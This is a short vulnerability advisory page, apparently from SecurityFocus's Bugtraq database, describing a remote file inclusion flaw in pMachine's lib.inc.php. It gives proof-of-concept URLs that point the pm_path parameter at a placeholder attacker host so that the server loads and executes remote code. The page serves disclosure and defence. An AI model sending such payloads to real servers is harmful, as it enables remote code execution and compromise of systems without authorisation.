Search: Home Bugtraq Vulnerabilities Mailing Lists Jobs Tools Beta Programs

PMachine Lib.Inc.PHP Remote Include Command Execution Vulnerability

The following proof of concepts have been made available by Frog Man <leseulfrog@hotmail.com>:

http://victim.example.com/pm/lib.inc.php?pm_path=http://attacker.example.com/&sfx=.txt with:

http://attacker.example.com/config.txt

or

http://victim.example.com/pm/lib.inc.php?pm_path=http://attacker.example.com/&sfx=/badcode.txt with:

http://attacker.example.com/config/badcode.txt







 

Privacy Statement
Copyright 2009, SecurityFocus